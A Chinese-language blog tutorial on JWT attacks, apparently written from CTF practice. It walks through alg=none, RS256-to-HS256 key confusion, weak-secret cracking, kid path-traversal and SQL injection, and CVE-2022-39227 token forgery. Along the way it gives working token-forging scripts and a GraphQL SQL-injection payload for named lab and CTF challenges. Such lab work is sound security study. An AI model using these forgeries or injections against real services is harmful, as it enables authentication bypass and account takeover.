主頁 >  其他 > 淺析JWT Attack

淺析JWT Attack

2022-12-15 07:14:35 其他

前言

在2022祥云杯時遇到有關JWT的題,當時沒有思路,對JWT進行學習后來對此進行簡單總結,希望能對正在學習JWT的師傅們有所幫助,

JWT

JWT,即JSON WEB TOKEN,它是一種用于通信雙方之間傳遞安全資訊的簡潔的、URL安全的表述性宣告規范,是一種標準化的格式,用于在系統之間發送經過加密簽名的JSON資料,理論上可以包含任何型別的資料,但最常用于發送關于用戶的資訊(“宣告”),以進行身份認證、會話處理和訪問控制,

簡單了解了它的定義后,我們接下來來看一下JWT的組成部分它分為三個部分,如下所示

1、Headers:頭部
2、Payload:有效載荷
3、Signature:簽名

這三個部分以.符號來連接,所以JWT的格式通常是xxx.yyy.zzz這種樣子

Headers

Headers通常由兩部分組成,令牌的型別簽名演算法,常見的演算法有很多種,例如 HMAC SHA256或 RSA,但它也還有一個kid引數,這是一個可選引數,全稱是key ID,它用于指定加密演算法的密鑰,

示例如下

ewogICJhbGciOiAiSFMyNTYiLAogICJ0eXAiOiAiSldUIgp9

這就是一個Headers,當我們對它進行Base64解碼就可以看到它的具體內容,具體如下

{
 "alg": "HS256",
 "typ": "JWT"
}

alg指的就是演算法,這里的演算法就是HS256typ指的是令牌型別,這里需要說明一點,就是明文在加密時其實采用的是Base64URL加密,這種加密方式并非Base64encode+URLencode,而是對一些特殊字符進行了替換,具體說明如下

JWT 作為一個令牌(token),有些場合可能會放到 URL(比如 api.example.com/?token=xxx),Base64有三個字符+、/和=,在 URL 里面有特殊含義,所以要被替換掉:=被省略、+替換成-,/替換成_ ,這就是 Base64URL 演算法,

Payload

有效載荷就是存放有效資訊的地方,其中包含宣告,宣告包含三個部分 1、已注冊宣告這個部分的話就是已經預先定義過的宣告,常見的宣告主要有以下幾種

iss: jwt簽發者
sub: jwt所面向的用戶
aud: 接收jwt的一方
exp: jwt的過期時間,這個過期時間必須要大于簽發時間
nbf: 定義在什么時間之前,該jwt都是不可用的.
iat: jwt的簽發時間
jti: jwt的唯一身份標識,主要用來作為一次性token,從而回避重放攻擊,

2、公共的宣告這些可以由使用 JWT 的人隨意定義,一般用于添加用戶的相關資訊或其他業務需要的必要資訊,但不建議添加敏感資訊,因為該部分在客戶端可進行解碼.3、私有的宣告這些是為在同意使用它們的各方之間共享資訊而創建的自定義宣告,私有宣告是提供者和消費者所共同定義的宣告,一般不建議存放敏感資訊,

示例如下

ewoJInN1YiI6ICJhZG1pbiIsCiAgICAidXNlcl9yb2xlIiA6ICJhZG1pbiIsCiAgICAiaXNzIjogImFkbWluIiwKICAgICJpYXQiOiAxNTczNDQwNTgyLAogICAgImV4cCI6IDE1NzM5NDAyNjcsIAogICAgIm5iZiI6IDE1NzM0NDA1ODIsIAogICAgImp0aSI6ICJkZmY0MjE0MTIxZTgzMDU3NjU1ZTEwYmQ5NzUxZDY1NyIgICAKfQ

進行base64URL解碼,結果如下

{
"sub": "admin", //jwt所面向的用戶
   "user_role" : "admin",   //當前登錄用戶
   "iss": "admin",         //該JWT的簽發者,有些是URL
   "iat": 1573440582,        //簽發時間
   "exp": 1573940267,        //過期時間
   "nbf": 1573440582,        //該時間之前不接收處理該Token
   "jti": "dff4214121e83057655e10bd9751d657"   //Token唯一標識
}

Signature

由于頭部和有效載荷以明文形式存盤,因此,需要使用簽名來防止資料被篡改,所以這部分是一個簽證資訊,這個簽證資訊由三部分組成

1、header (base64URL編碼)
2、payload (base64URL編碼)
3、secret(密鑰)

它的計算方式如下

Signature=HMACSHA256(base64UrlEncode(header) + "." +base64UrlEncode(payload),secret)
//假設這里是HS256演算法,如果是其他演算法的話開頭設定為其他演算法即可

現在了解了JWT的大致作用和其組成,接下來來學習一下JWT攻擊,

JWT 攻擊

JWT攻擊有多種情況,現在來對其進行逐一講解,

敏感資訊泄露

JWT保證的是資料傳輸程序中的完整性而不是機密性,

因為JWT的payload部分是使用Base64url編碼的,所以它其實是相當于明文傳輸的,當payload中攜帶了敏感資訊時,我們對payload部分進行Base64url解碼,就可以讀取到payload中攜帶的敏感資訊,

靶場演示

題目鏈接https://www.ctfhub.com/#/skilltree題目描述如下

JWT 的頭部和有效載荷這兩部分的資料是以明文形式傳輸的,如果其中包含了敏感資訊的話,就會發生敏感資訊泄露,試著找出FLAG,格式為 flag{}

進入環境后發現一個登錄框

 

在這里插入圖片描述

 

隨便輸入賬號密碼,登錄后發現界面如下

 

在這里插入圖片描述

查看此時的JWT

 

在這里插入圖片描述

 

想到題目中說頭部和載荷可能會有敏感泄露,將值取出分別進行Base64URL解碼

 

在這里插入圖片描述

兩處拼接一下,得到ctfhub{bb89d985db8cea6a2f2d34cb}

 

【----幫助網安學習,以下所有學習資料免費領!加vx:yj009991,備注 “博客園” 獲取!】

 ① 網安學習成長路徑思維導圖
 ② 60+網安經典常用工具包
 ③ 100+SRC漏洞分析報告
 ④ 150+網安攻防實戰技術電子書
 ⑤ 最權威CISSP 認證考試指南+題庫
 ⑥ 超1800頁CTF實戰技巧手冊
 ⑦ 最新網安大廠面試題合集(含答案)
 ⑧ APP客戶端安全檢測指南(安卓+IOS)

 

演算法修改攻擊

首先來簡述一下JWT中兩個常用的加密演算法

HMAC(HS256):是一種對稱加密演算法,使用秘密密鑰對每條訊息進行簽名和驗證RSA(RS256):是一種非對稱加密演算法,使用私鑰加密明文,公鑰解密密文,

從上面不難看出,HS256自始至終只有一個密鑰,而RS256是有兩個密鑰的,在通常情況下,HS256的密鑰我們是不能取到的,RS256的密鑰也是很難獲得的,RS256的的公鑰相對較容易獲取,但無論是HS256加密還是RS256加密,都是無法實作偽造JWT的,但當我們修改RSA256演算法為HS256演算法時,后端代碼會使用公鑰作為密鑰,然后用HS256演算法驗證簽名,如果我們此時有公鑰,那么此時我們就可與實作JWT的偽造,

靶場演示

題目鏈接https://www.ctfhub.com/#/skilltree

題目描述

有些JWT庫支持多種密碼演算法進行簽名、驗簽,若目標使用非對稱密碼演算法時,有時攻擊者可以獲取到公鑰,此時可通過修改JWT頭部的簽名演算法,將非對稱密碼演算法改為對稱密碼演算法,從而達到攻擊者目的,

進入環境后發現題目代碼

class JWTHelper {
 public static function encode($payload=array(), $key='', $alg='HS256') {
   return JWT::encode($payload, $key, $alg);
}
 public static function decode($token, $key, $alg='HS256') {
   try{
           $header = JWTHelper::getHeader($token);
           $algs = array_merge(array($header->alg, $alg));
     return JWT::decode($token, $key, $algs);
  } catch(Exception $e){
     return false;
  }
  }
   public static function getHeader($jwt) {
       $tks = explode('.', $jwt);
       list($headb64, $bodyb64, $cryptob64) = $tks;
       $header = JWT::jsonDecode(JWT::urlsafeB64Decode($headb64));
       return $header;
  }
}
?
$FLAG = getenv("FLAG");
$PRIVATE_KEY = file_get_contents("/privatekey.pem");
$PUBLIC_KEY = file_get_contents("./publickey.pem");
?
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
   if (!empty($_POST['username']) && !empty($_POST['password'])) {
       $token = "";
       if($_POST['username'] === 'admin' && $_POST['password'] === $FLAG){
           $jwt_payload = array(
               'username' => $_POST['username'],
               'role'=> 'admin',
          );
           $token = JWTHelper::encode($jwt_payload, $PRIVATE_KEY, 'RS256');
      } else {
           $jwt_payload = array(
               'username' => $_POST['username'],
               'role'=> 'guest',
          );
           $token = JWTHelper::encode($jwt_payload, $PRIVATE_KEY, 'RS256');
      }
       @setcookie("token", $token, time()+1800);
       header("Location: /index.php");
       exit();
  } else {
       @setcookie("token", "");
       header("Location: /index.php");
       exit();
  }
} else {
   if(!empty($_COOKIE['token']) && JWTHelper::decode($_COOKIE['token'], $PUBLIC_KEY) != false) {
       $obj = JWTHelper::decode($_COOKIE['token'], $PUBLIC_KEY);
       if ($obj->role === 'admin') {
           echo $FLAG;
      }
  } else {
       show_source(__FILE__);
  }
}
?>

 

簡單的看一下,大致意思就是當以用戶名為admin,密碼不是$flag時,此時登錄后JWT中payloadroleguest,而只有當roleadmin時才能夠得到Flag,所以我們這里肯定是需要偽造JWT的,我們先以admin為用戶名,隨便輸入密碼登錄一下此時得到JWT,將其拿去解密網站https://jwt.io解密一下

在這里插入圖片描述

 

發現加密方式是RS256非對稱加密,想到在登錄時,下方給出了公鑰

在這里插入圖片描述

所以這里就可以嘗試更改演算法為HS256,以公鑰作為密鑰來進行簽名和驗證,因此我們構造一個偽造JWT的腳本,內容如下

import jwt
import base64
?
public ="""-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqizf1rnxqfeyCAp52TQO
3uEyeB1HzqqbO8FBHWqLlhgmyPFqaopXVhZryzP+Sd6a3iQd8xeD7URswPHE4roA
kbI1GMta9zAdD1yPtp//JNZ55hx1iFY2n9gw2u8VL64n9sCc56H46L3W52Z37kvW
q5LuoLAuyJpP7Ofadt7biWaeXibZGQjPwlbCy31DyxdDFCt8pVrajVI97w3amHBU
Xhd0Ku+DOq9hjadtQbTkbIkAUR84yqt+25EXd/rg1w8we9ysNcTjAeUayRGPuQmX
UWJaFpsvuL7WeUb2xJqvieFwsCQppS1ZgaoRc0F835K+G3s3qWRi4AnvZxryfTzl
awIDAQAB
-----END PUBLIC KEY-----
"""
payload={ "username": "admin","role": "admin"}
print(jwt.encode(payload, key=public, algorithm='HS256'))

此時運行完后發現報錯

在這里插入圖片描述

這個是因為源代碼中進行了校驗,我們簡單設定一下即可,源代碼檔案地址如下

/usr/lib/python3/dist-packages/jwt/algorithms.py

我們在它的校驗前面增加這樣一句話

invalid_strings=[]

在這里插入圖片描述

此時保存退出,再運行檔案即可得到新JWT

 

在這里插入圖片描述

 

將新的JWT拿到網站中替換舊的JWT,重繪網站即可得到flag

在這里插入圖片描述

未驗證簽名

當用戶端提交請求給應用程式,服務端可能沒有對token簽名進行校驗,這樣,攻擊者便可以通過提供無效簽名簡單地繞過安全機制,此時就造成了越權漏洞的出現,假設現有payload如下

{ 
 "iat": 1668871293,
 "exp": 1668878493,
 "nbf": 1668871293,
 "sub": "quan9i",
}

這里的quan9i是普通用戶,按理說的話它是無法訪問到管理員的界面的,但由于這里的簽名是沒有驗證的,當我們修改payload時,這個JWT仍然有效,所以我們修改payload如下

{ 
 "iat": 1668871293,
 "exp": 1668878493,
 "nbf": 1668871293,
 "sub": "admin",
}

此時就垂直越權,變成了管理員用戶,可以訪問管理員的界面,

靶場演示

題目環境https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-unverified-signature題目描述

本實驗使用基于 JWT 的機制來處理會話,由于實施缺陷,服務器不會驗證它收到的任何 JWT 的簽名,

題目要求

要解決實驗室問題,請修改您的會話令牌以獲取對管理面板的訪問權限/admin,然后洗掉用戶carlos,

題目條件

您可以使用以下憑據登錄到您自己的帳戶:wiener:peter

打開環境后發現Cookie中沒什么東西,但想到題目給出了賬號,那就先找登錄點,發現有個My account

 

在這里插入圖片描述

 

點擊查看,發現是登錄界面,將剛剛題目條件中所給的用戶名和密碼放入

在這里插入圖片描述

此時查看cookie

在這里插入圖片描述

具體內容為

eyJraWQiOiIxYmE5NjA0Ny0wNjBiLTQ0MTAtODg1NC01YWYxYTQ2ZTljYWEiLCJhbGciOiJSUzI1NiJ9.eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6IndpZW5lciIsImV4cCI6MTY2OTI5NzgxMH0.JMb3Ttl7WLoVrTfcEq03VIafh7zDMu5_nhMtPc3qnhgENSl1WbMAMFfeTa-v0jS69A13W-J3_ccslHu25OW_SRPAq2GuAUoFfEGtthnP-PaDWFN2_UIIcaeAx8rj8bNy65apX37EnTx-sPo274XjW9hQgTRLT1ifHtfihvTzoOY94_2bLaR4JwSUoyoi_kXZW4IndvhqpHA2kn8jw2aQOJCCCjeHh2r_CDDQA1hrSKeP2FgIq07wagLZqzkG6ATexINTNI_4jwpO8Jy1U-l0voPQQ6g111GCkBDhhkCagnm4zh-_Kl2nDD-Xjp74VVZDCNojbLoeS2Y6RGPZ4GR28w

對第一個.后和第二個.之前的內容進行解碼(此部分內容為有效載荷)得到

{"iss":"portswigger","sub":"wiener","exp":1669297810}

題目提示了這里不校驗簽名,所以我們修改payload如下

{"iss":"portswigger","sub":"administrator","exp":1669297810}

再對其進行Base64URL編碼,替換掉原來的payload,此時就得到了新的JWT,將新的JWT放入session中,重新訪問此界面,發現多了一個功能點

在這里插入圖片描述

發現可以洗掉用戶

在這里插入圖片描述

任務完成,

 

在這里插入圖片描述

 

空加密演算法

這里需要先介紹一些利用的知識點

將signature置空,利用node的jsonwentoken庫已知缺陷:當jwt的signature為null或undefined時,jsonwebtoken會采用algorithm為none進行驗證

JWT支持使用空加密演算法,可以在header中指定algnone,此時只要把signature設定為空,提交到服務器,任何token都可以通過服務器的驗證,

假設現有JWT(解碼后的,無signature的)如下

{
   "alg" : "Hs256",
   "typ" : "jwt"
}
?
{
   "user" : "quan9i"
}

這里我們指定algNone,修改Payload中的useradmin,如下所示

{
   "alg" : "None",
   "typ" : "jwt"
}
?
{
   "user" : "admin"
}

此時再進行Base64URL編碼,就可以實作越權,得到管理員才可以訪問的界面,

靶場演示

靶場環境https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-flawed-signature-verification題目描述

本實驗使用基于 JWT 的機制來處理會話,服務器未安全地配置為接受未簽名的 JWT,

題目要求

要解決實驗室問題,請修改您的會話令牌以獲取對管理面板的訪問權限/admin,然后洗掉用戶carlos,

題目條件

您可以使用以下憑據登錄到您自己的帳戶:wiener:peter

進入環境后先去登錄

在這里插入圖片描述

 

得到JWT,題目提示了接受未簽名的JWT,所以將第二個點后的內容直接洗掉,而后再對前面內容進行Base64解碼

{"kid":"16adc077-c753-4bbe-a9df-46688c01ac46","alg":"RS256"}.{"iss":"portswigger","sub":"wiener","exp":1669304815}.

修改headers中的algnone,修改payload中的subadministrator,然后分別進行Base64URL編碼,即可得到新的JWT,在網站中對JWT進行替換,接下來再次訪問此網站,發現新功能點,

 

在這里插入圖片描述

 

點進去發現有洗掉用戶的功能

 

在這里插入圖片描述

 

任務完成,

 

在這里插入圖片描述

爆破密鑰

這個的話其實就是使用工具來對密鑰進行爆破,從而實作越權,這個的話在參考過其他師傅的文章后發現是有一些條件的,具體如下所示

1、JWT使用的加密演算法是HS256加密演算法
2、一段有效的、已簽名的token
3、簽名用的密鑰不復雜(弱密鑰)

然后這里還需要介紹一下爆破密鑰用的工具,鏈接如下https://github.com/brendan-rius/c-jwt-cracker安裝方式如下所示

1、git clone https://github.com/brendan-rius/c-jwt-cracker #下載
2、make #編譯

使用方式如下

./jwtcrack JWT 

在這里插入圖片描述

這是一個,還有一個爆破工具,可以參考字典,鏈接如下https://github.com/Sjord/jwtcrack安裝方式如下所示

1、git clone https://github.com/Sjord/jwtcrack 
2、pip install PyJWT tqdm

它的使用方式如下

python3 crackjwt.py JWT dictionary.txt //字典檔案是自己寫入的

靶場演示

題目描述

本實驗使用基于 JWT 的機制來處理會話,它使用極弱的密鑰來簽署和驗證令牌,這可以很容易地使用一個包含常見secret的單詞表來暴力破解,

題目要求

要解決實驗室問題,請首先暴力破解網站的密鑰,獲得此后,使用它簽署修改后的會話令牌,使您可以訪問管理面板/admin,然后洗掉用戶carlos

題目條件

您可以使用以下憑據登錄到您自己的帳戶:wiener:peter

進入環境后,依舊是先登錄獲取當前JWT

在這里插入圖片描述

因為題目已經提示了這里用的是暴力破解,所以我們用剛剛提到的工具,來爆破一下密鑰

./jwtcrack eyJraWQiOiIyZjRlMzM0Yy1lMzZjLTRhNWQtOWVjYi03ZDhkZDJhYThlYjMiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6IndpZW5lciIsImV4cCI6MTY2OTMwNzYwNn0.iMBR0rqiUQKT1a1YoonpXNY5hCNz16okJB9tbog0QRE

在這里插入圖片描述

這里爆破多次均未得到密鑰,所以我們選擇換另一個工具,自己找個字典來進行爆破字典鏈接https://github.com/wallarm/jwt-secrets/blob/master/jwt.secrets.list接下來使用工具指定字典來進行爆破

python3 crackjwt.py  eyJraWQiOiIyZjRlMzM0Yy1lMzZjLTRhNWQtOWVjYi03ZDhkZDJhYThlYjMiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6IndpZW5lciIsImV4cCI6MTY2OTMwNzYwNn0.iMBR0rqiUQKT1a1YoonpXNY5hCNz16okJB9tbog0QRE dictionary.txt

在這里插入圖片描述

得到密鑰為secret1進入解碼網站https://jwt.io,對jwt進行解碼在這里插入圖片描述

修改payload中的subadministrator,再在下方寫入密鑰secret1,生成新JWT在這里插入圖片描述

拿到網站中替換原JWT,發現新功能點

在這里插入圖片描述

訪問后發現可以洗掉用戶

在這里插入圖片描述

任務完成,

在這里插入圖片描述

 

Kid引數注入

前文在簡述Headers提到,它還有一個可選引數kid,當Headers中存在這個引數時,我們可以通過修改這個引數實作目錄遍歷、SQL注入等攻擊

#目錄遍歷
{
   "kid" : "/etc/passwd"
}

Kid引數的邏輯是類似于sql="select * from table where kid=$kid"這種,所以它是存在SQL注入漏洞的,示例如下

#sql注入
{
   "kid" : "0 union select 123"
}

此時它的Kid就被我們惡意篡改為123,此時就相當于拿到了Key,可以偽造JWT,實作越權,

靶場演示

靶場地址https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-kid-header-path-traversal題目描述

本實驗使用基于 JWT 的機制來處理會話,為了驗證簽名,服務器使用JWTkid標頭中的引數從其檔案系統中獲取相關密鑰

題目要求

要解決實驗室問題,請偽造一個 JWT,使您可以訪問管理面板/admin,然后洗掉用戶carlos,

題目條件

您可以使用以下憑據登錄到您自己的帳戶:wiener:peter

進入環境后,登錄獲取JWT安裝插件

在這里插入圖片描述

安裝后選擇New Symmetric Key,生成一個Key

在這里插入圖片描述

接下來修改K引數為AA==,點擊確認抓靶場的包

在這里插入圖片描述

點擊下面的sign

在這里插入圖片描述

將此時的JWT去替換網站的JWT,再重繪網站

在這里插入圖片描述

成功越權

在這里插入圖片描述

 

簡單說一下這里的原理:這里其實就是利用了kid的目錄遍歷攻擊,我們將kid引數指向標準檔案/dev/null,此時我們再利用bp的工具設定一個空的簽名密鑰,就實作了越權,成功得到管理員權限,

同時,這個Kid是Headers的一部分,Headers其實還有兩個不常用的引數,即JwkJku,這兩個的話也是存在漏洞的,他們的攻擊方式同Kid是較為相似的,所以這里不再去演示如何攻擊,靶場環境如下,有興趣的師傅可以看看,https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-jwk-header-injectionhttps://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-jku-header-injection

JWT攻擊實體

CVE-2022-39227

這個的話并沒有給出具體的POC,但是官方在commit中最下方給出了測驗代碼https://github.com/davedoesdev/python-jwt/commit/88ad9e67c53aa5f7c43ec4aa52ed34b7930068c9具體代碼如下所示

""" Test claim forgery vulnerability fix """
from datetime import timedelta
from json import loads, dumps
from test.common import generated_keys
from test import python_jwt as jwt
from pyvows import Vows, expect
from jwcrypto.common import base64url_decode, base64url_encode
?
@Vows.batch
class ForgedClaims(Vows.Context):
   """ Check we get an error when payload is forged using mix of compact and JSON formats """
   def topic(self):
       """ Generate token """
       payload = {'sub': 'alice'}
       return jwt.generate_jwt(payload, generated_keys['PS256'], 'PS256', timedelta(minutes=60))
?
   class PolyglotToken(Vows.Context):
       """ Make a forged token """
       def topic(self, topic):
           """ Use mix of JSON and compact format to insert forged claims including long expiration """
          [header, payload, signature] = topic.split('.')
           parsed_payload = loads(base64url_decode(payload))
           parsed_payload['sub'] = 'bob'
           parsed_payload['exp'] = 2000000000
           fake_payload = base64url_encode((dumps(parsed_payload, separators=(',', ':'))))
           return '{" ' + header + '.' + fake_payload + '.":"","protected":"' + header + '", "payload":"' + payload + '","signature":"' + signature + '"}'
?
       class Verify(Vows.Context):
           """ Check the forged token fails to verify """
           @Vows.capture_error
           def topic(self, topic):
               """ Verify the forged token """
               return jwt.verify_jwt(topic, generated_keys['PS256'], ['PS256'])
?
           def token_should_not_verify(self, r):
               """ Check the token doesn't verify due to mixed format being detected """
               expect(r).to_be_an_error()
               expect(str(r)).to_equal('invalid JWT format')

重點在中間部分,也就是這里

def topic(self, topic):
           """ Use mix of JSON and compact format to insert forged claims including long expiration """
          [header, payload, signature] = topic.split('.')
           parsed_payload = loads(base64url_decode(payload))
           parsed_payload['sub'] = 'bob'
           parsed_payload['exp'] = 2000000000
           fake_payload = base64url_encode((dumps(parsed_payload, separators=(',', ':'))))
           return '{" ' + header + '.' + fake_payload + '.":"","protected":"' + header + '", "payload":"' + payload + '","signature":"' + signature + '"}'

可以看到這里的話首先是對JWT進行了拆分,我們知道JWT的格式是xxx.yyy.zzz,這個以.來分離,那就是把三部分拆分開來,分別賦值給了headerpayloadsignature,接下來將進行了base64URL以及json解碼的payload賦值給了parsed_payload,而后將新內容sub=bob以及exp=2000000000放入了parsed_payload中,將進行過Base64編碼和json編碼的parsed_payload賦值給了fake_payload,最終生成的JWT格式如下

{" header.fake_payload.":"","protected":"header", "payload":"payload","signature":"signature"}

此時就完成了JWT的偽造,

那么這個漏洞是如何產生的呢?接下來我們看一下源檔案,查看python_jwt/__init__.py檔案

在這里插入圖片描述

首先看到 header, claims, _ = jwt.split('.'),它按.進行拆分,如何分別將三部分賦值給headers,claims以及_,接下來就是對頭部進行解碼,而后檢驗頭部演算法,后面也是校驗屬性的,接下來走到JWS這里

if pub_key: #驗證是否傳入密鑰
    token = JWS()
    token.allowed_algs = allowed_algs
    token.deserialize(jwt, pub_key) # 傳入整個用戶的JWT,JWS對JWT進行反序列化處理
    parsed_claims = json_decode(token.payload) # JWS對傳入部分進行json解碼

跟進反序列化,看它是怎么做的

在這里插入圖片描述

這里的話就是首先嘗試對傳入的JWT進行決議,我們知道這里傳入的是完整的原始JWT,而非拆分后的某個部分,JWT的格式是xxx.yyy.zzz這種,而json能決議的是{"a":1,"b":2,"c":3,"d":4,"e":5}這種格式的,所以它無疑會走向except ValueError這里,然后它對值進行拆分,分別賦給protectedpayloadsignature,然后就將o賦值給了self.objects,這里的話還有一個verify(key,alg)函式,我們跟進一下

在這里插入圖片描述

這里可以看到它其實是對JWT的各部分內容進行了一個檢驗,它這里檢驗的是原來的完整的JWT,所以這個肯定是沒有問題的,這個驗證肯定是可以通過的,

我們此時回到__init__.py

在這里插入圖片描述

發現這里在校驗過后,后面都沒有再用到token這個,后面是對headerclaims中的一些引數進行校驗,然后將parsed_headerparsed_claims值回傳了,這里就是問題所在, 在對整個JWT進行校驗過后,沒有回傳校驗過的資料,而是回傳一開始進行點分過后的資料,

我們的惡意payload如下所示

在這里插入圖片描述

此時拆分后他一直在校驗的是后面的灰色部分,這部分是原始的JWT,校驗肯定是可以通過的,而我們最侄訓傳的資料是前面的forged_payload,所以無論前面怎么添加,怎么替換,校驗都是可以通過的,此時你再去看官方給出的測驗代碼就可以理解它的思路了,

CTF實戰

CTFshow系列

Web345

打開靶場,進入環境

在這里插入圖片描述

看一下源代碼

在這里插入圖片描述

提示了admin界面,先記著,同時剛剛發現cookie含有JWT,放入網站https://jwt.io/中查看一下

在這里插入圖片描述

加密方式為空加密,所以這里的話,我們base64解碼一下,然后直接修改subadmin,再進行base64編碼,放入cookie中即可,接下來訪問admin界面

在這里插入圖片描述

 

web346

這里進入環境后,接下來進入靶場,看一下JWT,用解密網站解密一下

在這里插入圖片描述

發現有了加密格式,然后這里存在一種漏洞就是可以把加密方式換成空加密來繞過,但是這個網站是不能直接修改的,我們這里可以借助python腳本實作,腳本如下所示

import time
import jwt
?
# payload
token_dict={
 "iss": "admin",
 "iat": 1668871293,
 "exp": 1668878493,
 "nbf": 1668871293,
 "sub": "admin",
 "jti": "9892b9d99098ba229891bedcfa856b61"
}
?
# headers
headers = {
 "alg": "none",
 "typ": "JWT"
}
?
jwt_token = jwt.encode(token_dict,  # payload, 有效載體
key='',
                      headers=headers,  # json web token 資料結構包含兩部分, payload(有效載體), headers(標頭)
  algorithm="none",  # 指明簽名演算法方式, 默認也是HS256
                      )  # python3 編碼后得到 bytes, 再進行解碼(指明解碼的格式), 得到一個str
?
print(jwt_token)
?

注:這里安裝jwt模塊的時候,安裝的模塊是PyJWT模塊,同時不要給腳本名字命名為jwt.py,否則運行腳本時就會發生報錯,

在這里插入圖片描述

接下來運行腳本

在這里插入圖片描述

得到JWT

eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJpc3MiOiJhZG1pbiIsImlhdCI6MTY2ODg3MTI5MywiZXhwIjoxNjY4ODc4NDkzLCJuYmYiOjE2Njg4NzEyOTMsInN1YiI6ImFkbWluIiwianRpIjoiOTg5MmI5ZDk5MDk4YmEyMjk4OTFiZWRjZmE4NTZiNjEifQ.

去靶場中替換一下,同時訪問admin界面

在這里插入圖片描述

Web347

 

在這里插入圖片描述

提示弱口令,這里應該說的是密鑰,先記著進入環境后找到JWT去對應網站解碼

在這里插入圖片描述

HS256加密方式,我們這里的話需要猜解一下密鑰,然后修改才有效,既然提示了弱口令,那就可以試試123456這種,修改subadmin,得到新JWT后去靶場中修改JWT,然后訪問admin界面

在這里插入圖片描述

 

Web348

在這里插入圖片描述

題目提示爆破,這里就需要先介紹一個爆破工具了,鏈接如下https://github.com/brendan-rius/c-jwt-cracker安裝方式也很簡單

1、git clone https://github.com/brendan-rius/c-jwt-cracker #下載
2、make #編譯
3、./jwtcrack JWT #使用

這里將靶場中的JWT放入其中

在這里插入圖片描述

爆破出密鑰為aaab,接下來方法就同上,在解碼網站中,修改sub為admin,同時添加密鑰為aaab,然后拿著得到的新JWT,去替換網站的JWT,再去訪問admin界面即可,

在這里插入圖片描述

Web349

題目給了一個附件,內容如下

/* GET home page. */
router.get('/', function(req, res, next) {
 res.type('html');
 var privateKey = fs.readFileSync(process.cwd()+'//public//private.key');
 var token = jwt.sign({ user: 'user' }, privateKey, { algorithm: 'RS256' });
 res.cookie('auth',token);
 res.end('where is flag?');
 
});

router.post('/',function(req,res,next){
var flag="flag_here";
res.type('html');
var auth = req.cookies.auth;
var cert = fs.readFileSync(process.cwd()+'//public/public.key');  // get public key
jwt.verify(auth, cert, function(err, decoded) {
 if(decoded.user==='admin'){
res.end(flag);
}else{
res.end('you are not admin');
}
});
});

這里發現可以獲取公鑰和私鑰,RSA是用私鑰加密,公鑰解密,那么我們這里有私鑰了,就可以自己寫內容,然后用私鑰加密,接下來用公鑰解密就是我們偽造的內容,所以接下來訪問url /private.key獲取私鑰,然后寫個小腳本即可

import jwt
public = open('private.key', 'r').read()
payload={"user":"admin"}
print(jwt.encode(payload, key=public, algorithm='RS256'))

在這里插入圖片描述

接下來替換JWT,然后post訪問

在這里插入圖片描述

web350

題目給了附件,在里面發現公鑰

在這里插入圖片描述

這里的話應該考察的就是演算法修改攻擊,然后我們這里修改演算法為HS256,而后用公鑰加密,腳本如下

const jwt = require('jsonwebtoken');
var fs = require('fs');
var privateKey = fs.readFileSync('public.key');
var token = jwt.sign({ user: 'admin' }, privateKey, { algorithm: 'HS256' });
console.log(token)

運行腳本需要安裝jsonwebtoken

在這里插入圖片描述

得到JWT后替換一下,然后post發包即可獲取flag

在這里插入圖片描述

[祥云杯2022]FunWeb

注:因為這道題沒有復現環境了,所以我這里的部分圖片是來源于網上,參考的是X1r0z大師傅的https://exp10it.cn/

在這里插入圖片描述

進入環境后是個注冊界面,接下來隨便注冊賬號后進行登錄

在這里插入圖片描述

發現上方是有兩個功能點的

在這里插入圖片描述

獲取成績包后發現這里提示no admin同時發現JWT,想到這里可能需要偽造JWT,JWT最近新出的漏洞是CVE-2022-39227,那么我們就可以嘗試用這個漏洞來進行偽造JWT,偽造JWT腳本如下所示

from datetime import timedelta
from json import loads, dumps
from jwcrypto.common import base64url_decode, base64url_encode
?
def topic(topic):
   """ Use mix of JSON and compact format to insert forged claims including long expiration """
  [header, payload, signature] = topic.split('.')#點分
   parsed_payload = loads(base64url_decode(payload))#解碼
   parsed_payload['is_admin'] = 1#偽造
   fake_payload = base64url_encode((dumps(parsed_payload, separators=(',', ':'))))#編碼
   return '{" ' + header + '.' + fake_payload + '.":"","protected":"' + header + '", "payload":"' + payload + '","signature":"' + signature + '"}'#生成惡意載荷
token = topic('eyJhbGciOiJQUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE2NjcxMzcwMzAsImlhdCI6MTY2NzEzNjczMCwiaXNfYWRtaW4iOjAsImlzX2xvZ2luIjoxLCJqdGkiOiJ4YWxlR2dadl9BbDBRd1ZLLUgxb0p3IiwibmJmIjoxNjY3MTM2NzMwLCJwYXNzd29yZCI6IjEyMyIsInVzZXJuYW1lIjoiMTIzIn0.YnE5tK1noCJjultwUN0L1nwT8RnaU0XjYi5iio2EgbY7HtGNkSy_pOsnRl37Y5RJvdfdfWTDCzDdiz2B6Ehb1st5Fa35p2d99wzH4GzqfWfH5zfFer0HkQ3mIPnLi_9zFiZ4mQCOLJO9RBL4lD5zHVTJxEDrESlbaAbVOMqPRBf0Z8mon1PjP8UIBfDd4RDlIl9wthO-NlNaAUp45woswLe9YfRAQxN47qrLPje7qNnHVJczvvxR4-zlW0W7ahmYwODfS-KFp8AC80xgMCnrCbSR0_Iy1nsiCEO8w2y3BEcqvflOOVt_lazJv34M5e28q0czbLXAETSzpvW4lVSr7g')
print(token)

接下來想到我們抓的包的檔案名是graphql,而且還有POST引數,可能存在graphql注入,https://www.leavesongs.com/content/files/slides/GraphQL.pdf而后使用 getscoreusingnamehahaha方法查詢表結構,

{"query": """{ getscoreusingnamehahaha(name: "null' union select group_concat(sql) FROM sqlite_master; --"){ score name  } }"""}

回傳結果如下

CREATE TABLE users(
  ID INTEGER PRIMARY KEY,
  NAME TEXT NOT NULL,  
